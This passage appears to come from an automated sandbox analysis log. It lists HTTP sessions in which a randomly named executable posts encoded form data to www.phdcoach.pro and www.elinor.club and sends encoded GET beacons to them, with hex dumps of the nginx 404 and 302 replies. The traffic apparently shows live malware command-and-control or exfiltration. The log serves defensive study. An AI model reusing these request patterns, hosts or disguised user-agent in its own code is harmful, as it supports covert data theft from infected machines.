                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.849716178.172.160.30805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:13.709405899 CET1851OUTPOST /izsd/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Origin: http://www.phdcoach.pro
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.phdcoach.pro/izsd/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 38 6c 53 65 43 4a 58 2b 51 68 47 68 5a 57 58 6a 31 6d 4b 43 79 50 59 54 71 56 4a 4c 72 58 50 49 64 69 38 53 47 39 46 68 7a 6a 66 51 32 48 33 48 41 67 2b 38 6b 5a 33 4a 2f 67 2b 65 38 36 63 33 67 2b 37 30 49 42 65 4c 49 42 55 4e 37 44 73 6f 51 6c 37 73 6d 66 49 34 77 45 45 4d 32 70 46 44 4c 46 73 51 65 4d 41 78 46 44 42 59 43 6d 63 50 62 73 6a 69 67 6c 32 34 32 34 39 4b 39 2b 6d 33 55 42 64 54 6e 6a 61 6d 6b 66 6a 79 62 47 50 74 4f 6e 71 38 55 58 61 76 33 79 39 49 75 4f 44 42 51 4f 38 52 38 34 56 4f 6a 6d 73 46 50 48 64 72 66 6d 6c 61 34 7a 6d 37 39 5a 37 36 46 64 74 75 39 2f 69 7a 77 54 48 38 44 79 37 54 53 6f 45 33 62 74 50 59 6a 31 38 78 6e 30 47 2f 50 4f 65 39 67 79 78 59 57 6a 4e 49 5a 7a 33 6e 53 52 5a 35 4b 6f 48 41 31 49 46 64 51 6e 39 36 2f 68 31 6d 66 2b 57 52 32 6c 53 72 38 39 73 68 67 78 30 6f 38 2f 42 37 39 43 44 4c 77 48 30 68 41 75 2f 36 71 34 76 78 65 30 55 36 7a 4e 4a 79 46 62 7a 50 38 41 57 31 75 4c 46 68 46 77 65 43 50 55 79 77 37 71 67 2f 41 46 41 46 4e 4b 30 [TRUNCATED]
                                                                                                    Data Ascii: 1JgHkl=8lSeCJX+QhGhZWXj1mKCyPYTqVJLrXPIdi8SG9FhzjfQ2H3HAg+8kZ3J/g+e86c3g+70IBeLIBUN7DsoQl7smfI4wEEM2pFDLFsQeMAxFDBYCmcPbsjigl24249K9+m3UBdTnjamkfjybGPtOnq8UXav3y9IuODBQO8R84VOjmsFPHdrfmla4zm79Z76Fdtu9/izwTH8Dy7TSoE3btPYj18xn0G/POe9gyxYWjNIZz3nSRZ5KoHA1IFdQn96/h1mf+WR2lSr89shgx0o8/B79CDLwH0hAu/6q4vxe0U6zNJyFbzP8AW1uLFhFweCPUyw7qg/AFAFNK0ARBuddKvKc5WL3cR+bF3Bw8TCZptWJujKWfnkbuemKHJ4hjctZh98Uga3vKM1MBtJXEXo0+hwjhS5iCM3d6sTT+zl/IgvUzvUVQBV15CSV8nVEBOpMYou/qKdvW1V41RyrWeXt7ZJw6hHfZ8ziz4JS7hbS60PMdybPx42/oHkS1VSKj4+n1ODZCYHRyI7PDM97hnKXaXA9Lbzz033FT0/wYvvgcGvTcbMgLfBSm7PLxoO2LQpO+puoopeTNkWTcZqg/N1/NqBpd4mYEMxtlKkqZr0tt7IJqPoVmgsCiG/sgq5olLzfD/651jVTceyDkgYVNwi5MS7FPZuD96sCaRdVbjz2AJSvUuOjzGbgsKU8pwiJA2DRZGL5c5ANfPFyg+pVH7hw2o0YIJS/Djn5QJjo8fa9RJsjApw8op7b8KhuAWlVvVWVyHpAE3e4FjrinZUlK68cvpyyujdGlsysQ5RQ6+qviZ7fcYBpoNyLwxWAJzgHfbmm7OEZ5+tdNB45RVE3OZFFQOHhbCfSK7oEF3kvpmlcaTkvPn4ThY+HjNYVJiJN3kjZrCK+ONap93GGPNaoLNgQz/3TtOUeF+VXzqLhF4NSnpz/LXr+ZLjZM9vCJCEgLVKE21GCm7lLGb/wdwVPkUG1qK07lq8FtP/6hJpBehsMkOFSJeRJ [TRUNCATED]
                                                                                                    Dec 3, 2024 14:16:15.032291889 CET691INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:14 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.849717178.172.160.30805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:16.361067057 CET561OUTGET /izsd/?1JgHkl=xn6+B8LDUgeEZE/ewkyW9IYT/XMT7FP3Y1kTMJZ4lyb9girANxKziqifoVXMiOJsh7TOAwS+CRcOnA4ABGuIrM8s5EZR8uZbFlAOcv1SbgYYGS8/Ve3tsCmgzp0y8eq9Cg==&uZ9=wvL0WTq0tnld4P HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.phdcoach.pro
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:16:17.694446087 CET691INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:17 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 548
                                                                                                    Connection: close
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.849718194.58.112.174805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:23.333029985 CET811OUTPOST /1ne4/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.elinor.club
                                                                                                    Origin: http://www.elinor.club
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 207
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.elinor.club/1ne4/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 45 6c 6f 4e 72 75 42 61 4e 34 45 4c 5a 66 67 7a 54 37 64 35 67 46 39 47 31 79 49 51 38 65 5a 49 43 4b 58 41 76 68 61 4e 31 44 4d 56 4c 65 35 57 4b 56 51 56 49 49 6f 63 5a 53 4e 57 30 56 41 76 72 32 2b 6e 35 6a 6c 70 78 42 5a 72 6e 71 2b 77 2b 54 4c 6c 31 45 43 79 4a 4b 57 5a 2b 35 30 49 47 43 61 72 58 45 39 44 37 36 37 45 4d 55 37 47 52 58 32 74 42 33 48 6b 4b 51 55 50 65 48 45 64 49 38 43 57 6b 56 4e 63 37 4d 4e 77 70 73 5a 49 45 45 49 58 4f 50 7a 6c 56 68 6b 75 61 2f 57 37 56 32 4e 6e 64 73 51 59 39 55 72 64 41 76 68 52 32 39 68 4b 47 41 4e 59 51 48 30 3d
                                                                                                    Data Ascii: 1JgHkl=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXOPzlVhkua/W7V2NndsQY9UrdAvhR29hKGANYQH0=
                                                                                                    Dec 3, 2024 14:16:24.650866032 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:24 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.849719194.58.112.174805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:26.050920963 CET831OUTPOST /1ne4/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.elinor.club
                                                                                                    Origin: http://www.elinor.club
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 227
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.elinor.club/1ne4/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 46 45 59 4e 70 4a 56 61 4b 59 45 49 57 2f 67 7a 64 62 64 48 67 46 35 47 31 7a 4d 36 38 4e 39 49 43 72 6e 41 75 67 61 4e 79 44 4d 56 66 4f 35 58 56 6c 51 4f 49 49 6b 75 5a 53 68 57 30 56 45 76 72 79 36 6e 35 55 52 6d 33 52 5a 70 38 61 2b 79 36 54 4c 6c 31 45 43 79 4a 4b 71 7a 2b 39 67 49 46 7a 71 72 47 56 39 41 67 61 37 4c 4e 55 37 47 61 33 32 70 42 33 48 38 4b 55 4d 70 65 45 73 64 49 35 6d 57 6e 42 52 64 73 38 4d 37 33 63 59 73 48 55 68 66 48 4d 6a 30 66 78 67 43 56 49 32 39 5a 67 38 4e 48 4f 59 65 2b 55 44 32 41 73 4a 6e 7a 4b 38 69 63 6a 64 6f 4f 51 67 46 42 49 6a 45 77 53 2b 4a 6f 38 45 36 59 75 74 62 58 38 6a 46
                                                                                                    Data Ascii: 1JgHkl=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N9ICrnAugaNyDMVfO5XVlQOIIkuZShW0VEvry6n5URm3RZp8a+y6TLl1ECyJKqz+9gIFzqrGV9Aga7LNU7Ga32pB3H8KUMpeEsdI5mWnBRds8M73cYsHUhfHMj0fxgCVI29Zg8NHOYe+UD2AsJnzK8icjdoOQgFBIjEwS+Jo8E6YutbX8jF
                                                                                                    Dec 3, 2024 14:16:27.379477024 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:27 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.849720194.58.112.174805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:28.709522963 CET1848OUTPOST /1ne4/ HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Host: www.elinor.club
                                                                                                    Origin: http://www.elinor.club
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Content-Length: 1243
                                                                                                    Cache-Control: no-cache
                                                                                                    Referer: http://www.elinor.club/1ne4/
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Data Raw: 31 4a 67 48 6b 6c 3d 61 6b 33 62 41 61 73 75 7a 51 54 78 46 45 59 4e 70 4a 56 61 4b 59 45 49 57 2f 67 7a 64 62 64 48 67 46 35 47 31 7a 4d 36 38 4e 31 49 44 5a 66 41 76 44 79 4e 7a 44 4d 56 44 2b 35 4b 56 6c 52 57 49 4c 56 6c 5a 53 64 73 30 58 4d 76 72 58 75 6e 2f 68 39 6d 2b 52 5a 70 6a 71 2b 2f 2b 54 4c 77 31 45 79 2b 4a 4c 47 7a 2b 39 67 49 46 78 69 72 47 45 39 41 69 61 37 45 4d 55 37 61 52 58 32 42 42 33 76 73 4b 55 59 66 66 30 4d 64 4a 5a 32 57 33 69 35 64 75 63 4d 35 32 63 59 30 48 55 39 51 48 4d 2b 46 66 79 38 73 56 4f 47 39 61 55 38 58 59 74 41 2f 71 30 72 48 4f 4d 35 79 79 34 46 48 62 42 4a 31 54 6e 59 2f 4f 75 36 73 7a 51 6d 79 74 74 70 72 42 5a 64 72 57 6f 53 6c 71 48 54 32 38 32 2f 2f 49 6a 48 63 74 39 51 73 4d 6b 63 67 61 63 37 73 72 4a 36 55 53 71 68 6b 2b 66 4c 58 71 78 4d 75 50 44 64 6f 42 6c 70 65 39 44 75 65 55 67 46 4e 4b 6b 38 51 6c 38 52 66 4a 6f 37 62 5a 57 48 79 50 45 4f 68 50 45 4a 56 49 69 69 6c 66 64 4b 2b 56 4a 71 54 64 4e 51 4e 4f 45 4a 66 32 71 37 31 36 50 31 50 76 37 6c [TRUNCATED]
                                                                                                    Data Ascii: 1JgHkl=ak3bAasuzQTxFEYNpJVaKYEIW/gzdbdHgF5G1zM68N1IDZfAvDyNzDMVD+5KVlRWILVlZSds0XMvrXun/h9m+RZpjq+/+TLw1Ey+JLGz+9gIFxirGE9Aia7EMU7aRX2BB3vsKUYff0MdJZ2W3i5ducM52cY0HU9QHM+Ffy8sVOG9aU8XYtA/q0rHOM5yy4FHbBJ1TnY/Ou6szQmyttprBZdrWoSlqHT282//IjHct9QsMkcgac7srJ6USqhk+fLXqxMuPDdoBlpe9DueUgFNKk8Ql8RfJo7bZWHyPEOhPEJVIiilfdK+VJqTdNQNOEJf2q716P1Pv7lfHBsQc6c42f0DerBkGbDsAmWnx5gZ8e00Ni9eiWUB2PbpQ3ka7zozybae0ZE+e712qbXXkVzDAJJgYPodDjc/XyJwLQliDIIItos6I0oiGZDYDWARQbmVhpxPQNJ4Lv8S2FoPR8D/e+jp2IoVilFjv0QzuLbX8H7QX6NmeAqiRxRSVkFr9S/D8BnAY7aC5aLoooRsmekfDLqbsojofIDa4kuxCoEBNtE7KJOKnYo8pRoZdNQFC8ytn7Z+Lkc3yo7kam+Qz8zVWnw+RncUoqI/L6Yf4488hiEMjP6xyq9Qrbn7dPd5hTUhKgPTnUReWfaR8KTlLER1zUW7h/oLQpiFSyJxLhhy2f/xPQtv7D6LHbBxhga+0L7kWOKg5sMxC6M8t28A+4e6TkLBnMnSaYwe35saCG68U+lPkWv03uK9UpRFVdCK0r8Uxys/DWKLK6IwlBebbizCyeNUTsiSLMhgc6fILDvpEtKrFxjzzfzh3Oy3oWEd7HMor/N19c+V9u86E7MRZMyvjooDUK6sTJJanhTRNRo/LBuG+0Bmtr8HtqHYCAsFRt6o+0OLh7BpcLvMnG3v6iLjHnrdlX1SFVbHguzGo4XyXMf9NG8p1cBss86fqPBQAcA8++5dq5RInZS5v18J00AeaWake4YbBuf83GwJLzq/+wNNE [TRUNCATED]
                                                                                                    Dec 3, 2024 14:16:30.021274090 CET341INHTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:29 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.849721194.58.112.174805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:31.360243082 CET560OUTGET /1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA== HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Accept-Language: en-US
                                                                                                    Host: www.elinor.club
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                    Dec 3, 2024 14:16:32.675774097 CET500INHTTP/1.1 302 Moved Temporarily
                                                                                                    Server: nginx
                                                                                                    Date: Tue, 03 Dec 2024 13:16:32 GMT
                                                                                                    Content-Type: text/html
                                                                                                    Content-Length: 154
                                                                                                    Connection: close
                                                                                                    Location: http://elinor.club/1ne4/?uZ9=wvL0WTq0tnld4P&1JgHkl=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5hRbnJSY7Fzwy0niAuWJ/cwCJWSeGkVgu4T1N3P5ck3FVA==
                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.849722134.122.191.187805268C:\Program Files (x86)\QOsGpgIPKAjdqPaEBSlKNDiVTLIwCImJoGybGTbSHwPOvCQcuQhrMxoTUvTx\PWhloTdOLAusO.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 3, 2024 14:16:38.673286915 CET817OUTPOST /s6zh/ HTTP/1.1
